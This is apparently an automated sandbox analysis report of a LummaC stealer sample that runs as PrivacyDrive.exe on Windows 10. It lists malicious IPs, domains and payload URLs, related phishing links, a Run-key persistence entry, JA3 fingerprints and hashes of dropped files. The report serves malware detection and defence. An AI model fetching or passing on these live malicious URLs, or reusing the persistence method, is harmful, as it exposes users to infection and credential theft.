          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          185.255.122.133
          		finalstepgo.comNetherlands
          		42237ICMESEtrue
          172.67.206.221
          		racedsuitreow.shopUnited States
          		13335CLOUDFLARENETUStrue

          Private

          IP
          127.0.0.1

          General Information

          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1519581
          Start date and time:2024-09-26 17:45:31 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 6m 56s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:defaultwindowscmdlinecookbook.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:21
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.evad.win@13/30@4/3
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 90%
          • Number of executed functions: 25
          • Number of non-executed functions: 275

          Warnings

          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 52.168.117.173
          • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          11:46:24API Interceptor40x Sleep call for process: powershell.exe modified
          11:46:27API Interceptor2x Sleep call for process: svchost.exe modified
          11:46:47API Interceptor3x Sleep call for process: PrivacyDrive.exe modified
          11:47:08API Interceptor2x Sleep call for process: WerFault.exe modified
          16:46:39AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RATU0Beb C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe
          16:46:47AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RATU0Beb C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          185.255.122.133http://clicktogo.clickGet hashmaliciousUnknownBrowse
          • clicktogo.click/
          172.67.206.221https://finalstepgo.com/uploads/il2.txtGet hashmaliciousLummaCBrowse
            LcDQjpdIiU.exeGet hashmaliciousLummaCBrowse
              BLHvvl44N0.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                LcDQjpdIiU.exeGet hashmaliciousLummaCBrowse
                  ptgl503.exeGet hashmaliciousLummaCBrowse
                    0x000e00000001da78-93.exeGet hashmaliciousLummaCBrowse
                      https://finalsteptogo.com/uploads/pnk333.zipGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                        file.exeGet hashmaliciousLummaC, VidarBrowse
                          file.exeGet hashmaliciousLummaCBrowse
                            file.exeGet hashmaliciousLummaC, VidarBrowse

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              racedsuitreow.shophttps://finalstepgo.com/uploads/il2.txtGet hashmaliciousLummaCBrowse
                              • 172.67.206.221
                              p37SE6gM52.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                              • 104.21.37.97
                              iq2HxA0SLw.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                              • 104.21.37.97
                              file.exeGet hashmaliciousLummaCBrowse
                              • 104.21.37.97
                              LcDQjpdIiU.exeGet hashmaliciousLummaCBrowse
                              • 172.67.206.221
                              BLHvvl44N0.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                              • 172.67.206.221
                              LcDQjpdIiU.exeGet hashmaliciousLummaCBrowse
                              • 172.67.206.221
                              ptgl503.exeGet hashmaliciousLummaCBrowse
                              • 172.67.206.221
                              0x000e00000001da78-93.exeGet hashmaliciousLummaCBrowse
                              • 172.67.206.221
                              LaWl4DY2kW.exeGet hashmaliciousLummaCBrowse
                              • 104.21.37.97
                              finalstepgo.comhttps://finalstepgo.com/uploads/il2.txtGet hashmaliciousLummaCBrowse
                              • 185.255.122.133

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              CLOUDFLARENETUShttps://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFuNzdj0L4FdhJ5nCR-2FN4hC1EQvQl8aYTZmJnyL7UprLPl6jm_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZNGQFMsovO-2BDIfDd8om-2B0qBy65B6YpFy69QbHhs-2BHgEvOHFjaifdzxTG-2BoF-2FuDOLuTHm54RFjvuOkCJR7XiPuWrmSEludVLuruwujukWEHVWjC-2FDPwQVnY-2FWYeUOeUMiIJrlK0jhCMy-2FOFonKAMquJlmIQ-2BNXYSWrqTiWYFVkmmc7dzn5iK5psvIGTET-2BqxX8Q6Ayw2yLioyuMU4tX-2FlK-2FnxZVZw2UMS4dooTbsupKHmMJQfuS7sr7nP8dfybIqm2g-3D#Na2FybEBsYXN0d2FsbC5jb20=Get hashmaliciousUnknownBrowse
                              • 172.67.159.66
                              http://0e0hshi.trafiklite.com/Get hashmaliciousHTMLPhisherBrowse
                              • 104.17.25.14
                              https://www.google.co.za/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s%2Furl.za.m.mimecastprotect.com/s/BjZHCy856GFEJl8cZf1CxlF3BGet hashmaliciousUnknownBrowse
                              • 104.21.67.246
                              https://finalstepgo.com/uploads/il2.txtGet hashmaliciousLummaCBrowse
                              • 172.67.206.221
                              https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFuNzdj0L4FdhJ5nCR-2FN4hC1EQvQl8aYTZmJnyL7UprLPl6jm_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZNGQFMsovO-2BDIfDd8om-2B0qBy65B6YpFy69QbHhs-2BHgEvOHFjaifdzxTG-2BoF-2FuDOLuTHm54RFjvuOkCJR7XiPuWrmSEludVLuruwujukWEHVWjC-2FDPwQVnY-2FWYeUOeUMiIJrlK0jhCMy-2FOFonKAMquJlmIQ-2BNXYSWrqTiWYFVkmmc7dzn5iK5psvIGTET-2BqxX8Q6Ayw2yLioyuMU4tX-2FlK-2FnxZVZw2UMS4dooTbsupKHmMJQfuS7sr7nP8dfybIqm2g-3D#Na2FybEBsYXN0d2FsbC5jb20=Get hashmaliciousUnknownBrowse
                              • 104.21.34.107
                              https://qrco.de/bfQgn5Get hashmaliciousUnknownBrowse
                              • 188.114.97.3
                              https://www.sendspace.com/pro/qy2iy1Get hashmaliciousHTMLPhisherBrowse
                              • 104.17.25.14
                              https://kusjp5q7xwyt.larksuite.com/wiki/XzhhwohBhigCbykSafAueRYKsXd?from=from_copylinkGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                              • 172.67.74.152
                              z64BLPL.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 188.114.97.3
                              https://shorturl.at/KcKVc?qwN=AOVGKV9KYE%3EQtv=zkyz2kvn1aGet hashmaliciousUnknownBrowse
                              • 104.26.8.129
                              ICMESEhttps://finalstepgo.com/uploads/il2.txtGet hashmaliciousLummaCBrowse
                              • 185.255.122.133
                              https://finalsteptogo.com/uploads/il4.txtGet hashmaliciousUnknownBrowse
                              • 185.255.122.133
                              http://finalsteptogo.comGet hashmaliciousUnknownBrowse
                              • 185.255.122.133
                              https://finalsteptogo.com/uploads/pnk333.zipGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                              • 185.255.122.133
                              tr9.txt.ps1Get hashmaliciousUnknownBrowse
                              • 185.255.122.133
                              http://clicktogo.clickGet hashmaliciousUnknownBrowse
                              • 185.255.122.133
                              QtGui4.dllGet hashmaliciousUnknownBrowse
                              • 185.255.122.14
                              QtGui4.dllGet hashmaliciousUnknownBrowse
                              • 185.255.122.14
                              ExeFile (242).exeGet hashmaliciousNanocoreBrowse
                              • 185.217.1.176
                              http://nhbmp.crptecnologia.com/4IPiOX13247BLaM1207nrxukbsbkr14555RITOCMGDOZBIOFM6540MWYR15626W17Get hashmaliciousPhisherBrowse
                              • 91.236.116.25

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              28a2c9bd18a11de089ef85a160da29e4https://finalstepgo.com/uploads/il2.txtGet hashmaliciousLummaCBrowse
                              • 185.255.122.133
                              https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFuNzdj0L4FdhJ5nCR-2FN4hC1EQvQl8aYTZmJnyL7UprLPl6jm_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZNGQFMsovO-2BDIfDd8om-2B0qBy65B6YpFy69QbHhs-2BHgEvOHFjaifdzxTG-2BoF-2FuDOLuTHm54RFjvuOkCJR7XiPuWrmSEludVLuruwujukWEHVWjC-2FDPwQVnY-2FWYeUOeUMiIJrlK0jhCMy-2FOFonKAMquJlmIQ-2BNXYSWrqTiWYFVkmmc7dzn5iK5psvIGTET-2BqxX8Q6Ayw2yLioyuMU4tX-2FlK-2FnxZVZw2UMS4dooTbsupKHmMJQfuS7sr7nP8dfybIqm2g-3D#Na2FybEBsYXN0d2FsbC5jb20=Get hashmaliciousUnknownBrowse
                              • 185.255.122.133
                              https://qrco.de/bfQgn5Get hashmaliciousUnknownBrowse
                              • 185.255.122.133
                              https://www.sendspace.com/pro/qy2iy1Get hashmaliciousHTMLPhisherBrowse
                              • 185.255.122.133
                              http://clck.ru/3DSS5HGet hashmaliciousUnknownBrowse
                              • 185.255.122.133
                              http://a1034295.xsph.ru/vew/ye/worke/Get hashmaliciousUnknownBrowse
                              • 185.255.122.133
                              http://a1034295.xsph.ru/favicon.icoGet hashmaliciousUnknownBrowse
                              • 185.255.122.133
                              https://www.google.com.ai/amp/clck.ru/3DSSCz?hghghghHGVGvbbgffGFHGJdgddghfhghfgdgdgdgfhgg?sdfsewsrewrettfgGet hashmaliciousUnknownBrowse
                              • 185.255.122.133
                              https://shorturl.at/KcKVc?qwN=AOVGKV9KYE%3EQtv=zkyz2kvn1aGet hashmaliciousUnknownBrowse
                              • 185.255.122.133
                              https://lsaustralasia-my.sharepoint.com/:f:/g/personal/janine_lsaust_com_au/EggCi2jFo0JOu2itfCjIwu4B_JvtVZTi0sK58OhnVfOx1Q?e=1IcsEeGet hashmaliciousUnknownBrowse
                              • 185.255.122.133
                              3b5074b1b5d032e5620f69f9f700ff0ehttps://finalstepgo.com/uploads/il2.txtGet hashmaliciousLummaCBrowse
                              • 185.255.122.133
                              https://qrco.de/bfQgn5Get hashmaliciousUnknownBrowse
                              • 185.255.122.133
                              https://www.sendspace.com/pro/qy2iy1Get hashmaliciousHTMLPhisherBrowse
                              • 185.255.122.133
                              http://a1034295.xsph.ru/vew/ye/worke/Get hashmaliciousUnknownBrowse
                              • 185.255.122.133
                              z64BLPL.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 185.255.122.133
                              https://shorturl.at/KcKVc?qwN=AOVGKV9KYE%3EQtv=zkyz2kvn1aGet hashmaliciousUnknownBrowse
                              • 185.255.122.133
                              https://lsaustralasia-my.sharepoint.com/:f:/g/personal/janine_lsaust_com_au/EggCi2jFo0JOu2itfCjIwu4B_JvtVZTi0sK58OhnVfOx1Q?e=1IcsEeGet hashmaliciousUnknownBrowse
                              • 185.255.122.133
                              file.exeGet hashmaliciousUnknownBrowse
                              • 185.255.122.133
                              https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRHGet hashmaliciousUnknownBrowse
                              • 185.255.122.133
                              TLS20242025.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 185.255.122.133
                              a0e9f5d64349fb13191bc781f81f42e1https://finalstepgo.com/uploads/il2.txtGet hashmaliciousLummaCBrowse
                              • 172.67.206.221
                              https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRHGet hashmaliciousUnknownBrowse
                              • 172.67.206.221
                              0.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                              • 172.67.206.221
                              DropboxInstaller.exeGet hashmaliciousUnknownBrowse
                              • 172.67.206.221
                              DropboxInstaller.exeGet hashmaliciousUnknownBrowse
                              • 172.67.206.221
                              http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwEGet hashmaliciousWinSearchAbuseBrowse
                              • 172.67.206.221
                              file.exeGet hashmaliciousSmokeLoaderBrowse
                              • 172.67.206.221
                              p37SE6gM52.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                              • 172.67.206.221
                              3ZD5tEC5DH.exeGet hashmaliciousLummaCBrowse
                              • 172.67.206.221
                              a7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                              • 172.67.206.221

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\ProgramData\Microsoft\Network\Downloader\edb.log

                              Download File
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1310720
                              Entropy (8bit):1.3258627147897735
                              Encrypted:false
                              SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrW:KooCEYhgYEL0In
                              MD5:B0E07EEAD2754656DB0445A04B7F8E67
                              SHA1:5BAE55C9AFC07A25013DC00768B7CF18F0D0FE7D
                              SHA-256:77246B2A5767425122AC1EF60CF1A39ADF44F677D540AC522D20125A0B66F95B
                              SHA-512:4925225EE5D470194A6CEC7D59E768C703F71D6810657F716A6697168968481F4E68810D808BF97A03D099D37C83B7030F2CC4DA404EB7A396509698DB2BB878
                              Malicious:false
                              Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                              Download File
                              Process:C:\Windows\System32\svchost.exe
                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0dfd3e4c, page size 16384, DirtyShutdown, Windows version 10.0
                              Category:dropped
                              Size (bytes):1310720
                              Entropy (8bit):0.4221307465671799
                              Encrypted:false
                              SSDEEP:1536:JSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Jaza/vMUM2Uvz7DO
                              MD5:906962F093C46FDE900BB5395773A91A
                              SHA1:C6AF3F9C4EE86411811436BDB226453FAFE17BE8
                              SHA-256:6A0692C477FDB913E444C2937331C4F407C9AB87D92C103B83F484E0916680E7
                              SHA-512:FCD8B252E41EA51833CB38147B21A423EB69A3AD73AAC13F6C77A1DBD5A55BA0F210F1CFCC0122D482202145611C5CE5E9D2211CDFF9B3935F0EFF8F6E242C5E
                              Malicious:false
                              Preview:..>L... .......A.......X\...;...{......................0.!..........{A......|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...................................:.*.....|=................../.a.....|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                              Download File
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):16384
                              Entropy (8bit):0.07755689921382056
                              Encrypted:false
                              SSDEEP:3:n/8YeJgRWjn13a/M0q/sZKvollcVO/lnlZMxZNQl:/8zJgRW53q2/4KQOewk
                              MD5:64CA0858D9D04A02F82272376F91D571
                              SHA1:D6466EE3AD39CF60173AA3E7AF2F2439D1123F64
                              SHA-256:D3349FF99C06D065DF78B192C27F4B5AF5849619A6F644145B3A9CA092149C47
                              SHA-512:48FB9D57655E184A678488459FD9886FE0809DC1A0FC22B1A70DE2AD7CCCFBDDB5350AB3CDF74429C36EB81E12F202464AA74B29B83A86386F9DED0AA263BB24
                              Malicious:false
                              Preview:.lWc.....................................;...{.......|.......{A..............{A......{A..........{A]................./.a.....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PrivacyDrive.exe_399bced0f19559916f29b8661c38217a355522d5_7d659330_88be3ff3-0823-458e-b933-1ef07a852004\Report.wer

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):1.0968956902063205
                              Encrypted:false
                              SSDEEP:192:QKK8VGzYj00FxNEyUjTcZr8kF9azuiFb9Z24IO8ZA:QKK8YEjvFxNijSazuiFb9Y4IO8e
                              MD5:22DECCCF0721C379A7F5BA8298772C5C
                              SHA1:DBFAD8BA9ADAA90E756D1BD4C59F88BB0BDEB2A3
                              SHA-256:6D16A0087DEDCD40DE5721C58B197B295FA293B3617B8BDE0232914F2884932A
                              SHA-512:C9A6650909392173DF67580C460CEF7321050FDC287B15878211E1DD7956855152D427EF05342C3908BA0E1FCD4C6A5FF748C8A5DF3922AD5F29C9E12937E02F
                              Malicious:true
                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.8.3.9.2.0.8.9.4.7.1.1.7.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.8.b.e.3.f.f.3.-.0.8.2.3.-.4.5.8.e.-.b.9.3.3.-.1.e.f.0.7.a.8.5.2.0.0.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.5.c.b.a.c.4.1.-.e.b.a.7.-.4.2.0.c.-.b.d.e.c.-.0.e.6.3.4.1.d.4.1.c.5.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.r.i.v.a.c.y.D.r.i.v.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.r.i.v.a.c.y.D.r.i.v.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.c.8.-.0.0.0.1.-.0.0.1.4.-.c.1.1.6.-.0.d.4.5.2.b.1.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.f.2.e.4.0.a.8.6.4.b.d.2.7.1.9.8.0.3.2.4.7.b.3.9.f.f.3.2.6.d.e.0.0.0.0.0.9.0.4.!.0.0.0.0.0.3.a.c.1.9.1.b.2.3.5.b.3.a.8.6.7.5.3.9.7.2.0.0.7.0.a.5.e.6.c.a.1.1.0.8.b.4.f.2.!.P.r.i.v.a.c.y.D.r.i.v.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.9././.1.1././.0.1.:.0.

                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PrivacyDrive.exe_399bced0f19559916f29b8661c38217a355522d5_7d659330_fca01ca3-85f0-4bce-8d1a-34dc9a94153d\Report.wer

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):1.0966247460314005
                              Encrypted:false
                              SSDEEP:192:YY8VGzYm00FxNJ6yUjTcZr8kF9azuiFb9Z24IO8ZA:V8YEmvFxNJMjSazuiFb9Y4IO8e
                              MD5:85B7CD5FAC6DBB3A7BE894531EB79F90
                              SHA1:5E4F2AF6ADBF1297A1755095515429FC97ADE774
                              SHA-256:0B36281554FFA82A06C89A7614B1C935A2DAE3ACC8C9EB00E4E706A9487F22A4
                              SHA-512:E33D086C35F5CCE9F28B1237CDB4F68F7C9ECF17FBD5699555281D9410130A7E12699F6636ABFC768919B723EE916B3C65ABFDBFAF79B10BE9E4726783EB0FB4
                              Malicious:true
                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.8.3.9.2.1.0.5.1.0.8.0.0.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.c.a.0.1.c.a.3.-.8.5.f.0.-.4.b.c.e.-.8.d.1.a.-.3.4.d.c.9.a.9.4.1.5.3.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.2.a.c.0.5.a.a.-.c.f.b.2.-.4.d.e.5.-.a.f.b.6.-.8.1.b.a.3.0.b.8.4.d.5.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.r.i.v.a.c.y.D.r.i.v.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.r.i.v.a.c.y.D.r.i.v.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.c.8.-.0.0.0.1.-.0.0.1.4.-.c.1.1.6.-.0.d.4.5.2.b.1.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.f.2.e.4.0.a.8.6.4.b.d.2.7.1.9.8.0.3.2.4.7.b.3.9.f.f.3.2.6.d.e.0.0.0.0.0.9.0.4.!.0.0.0.0.0.3.a.c.1.9.1.b.2.3.5.b.3.a.8.6.7.5.3.9.7.2.0.0.7.0.a.5.e.6.c.a.1.1.0.8.b.4.f.2.!.P.r.i.v.a.c.y.D.r.i.v.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.9././.1.1././.0.1.:.0.

                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PrivacyDrive.exe_8656b2f314abb98882e678a2dbf4aab982b7182_7d659330_dd4513b3-028e-469c-93b1-188613156302\Report.wer

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):1.101823322915865
                              Encrypted:false
                              SSDEEP:192:xDiRGzYzq0BU/OyUjZaZr8kF9azuiFb9Z24IO8qA:Vi8EzxBU/gjCazuiFb9Y4IO8j
                              MD5:86D14B06F4275663AF9A15462E9C2594
                              SHA1:81EE6EF947C10A6472A203E297567A22AD6E0688
                              SHA-256:0E3F3D2F029AF6CFA256C37A2AF2A1EDD1C797EBD4E3F9369039B2D4E2D0FCED
                              SHA-512:6B4152ABF84F89B89D7B343E420656E7D750A4077784132C0BF43E81F16CB699A2F96DBAC9BCB4BCA112D04E55A54B78E94B79AFE4CB64F606490781ADBEB41D
                              Malicious:true
                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.8.3.9.2.1.9.4.2.2.7.1.3.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.8.3.9.2.1.9.8.2.8.9.6.0.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.d.4.5.1.3.b.3.-.0.2.8.e.-.4.6.9.c.-.9.3.b.1.-.1.8.8.6.1.3.1.5.6.3.0.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.e.6.5.3.5.7.9.-.7.4.0.8.-.4.7.6.d.-.a.c.f.a.-.5.3.a.8.f.1.e.8.b.f.a.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.r.i.v.a.c.y.D.r.i.v.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.r.i.v.a.c.y.D.r.i.v.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.2.f.c.-.0.0.0.1.-.0.0.1.4.-.4.f.e.6.-.9.4.4.b.2.b.1.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.f.2.e.4.0.a.8.6.4.b.d.2.7.1.9.8.0.3.2.4.7.b.3.9.f.f.3.2.6.d.e.0.0.0.0.0.9.0.4.!.0.0.0.0.0.3.a.c.1.9.1.b.2.3.5.b.3.a.8.6.7.5.3.9.7.2.0.0.7.0.a.5.e.

                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PrivacyDrive.exe_fef1a7949e4fa8cb69f4d5963b96612fcca58a7_7d659330_f744aa91-56af-4ef1-8f82-7361129391f5\Report.wer

                              Download File
                              Process:C:\Windows\SysWOW64\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):1.1039131192671594
                              Encrypted:false
                              SSDEEP:192:vR8VGzY0K0PdzuyUjTcZr8kF9azuiFb9Z24IO8ZA:Z8YE0RPdzAjSazuiFb9Y4IO8e
                              MD5:3578AA287953D48009F2663494552057
                              SHA1:64D9FA397A0BC619026131624A5186E7D85087E5
                              SHA-256:E1F4F2505E3429C1829AA8F761698C85F119E40EEF647A061C813A3ACB6B78BB
                              SHA-512:3F5FC5977F3A31821AEFB5857746225C927ED19ACAE558774F312BA2642ACE8204D1BBFB368EA5C7F2C80F02B80CD1E6FE85F9266744EE547B1189B0D397D0CC
                              Malicious:true
                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.8.3.9.2.1.1.4.9.6.6.3.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.8.3.9.2.1.2.4.4.9.7.6.9.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.7.4.4.a.a.9.1.-.5.6.a.f.-.4.e.f.1.-.8.f.8.2.-.7.3.6.1.1.2.9.3.9.1.f.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.3.e.2.8.c.f.a.-.d.5.f.5.-.4.4.2.a.-.9.3.f.a.-.1.4.8.9.c.8.7.e.6.e.2.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.r.i.v.a.c.y.D.r.i.v.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.r.i.v.a.c.y.D.r.i.v.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.c.8.-.0.0.0.1.-.0.0.1.4.-.c.1.1.6.-.0.d.4.5.2.b.1.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.f.2.e.4.0.a.8.6.4.b.d.2.7.1.9.8.0.3.2.4.7.b.3.9.f.f.3.2.6.d.e.0.0.0.0.0.9.0.4.!.0.0.0.0.0.3.a.c.1.9.1.b.2.3.5.b.3.a.8.6.7.5.3.9.7.2.0.0.7.0.a.5.e.6.c.a.1.1.

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER6C51.tmp.dmp

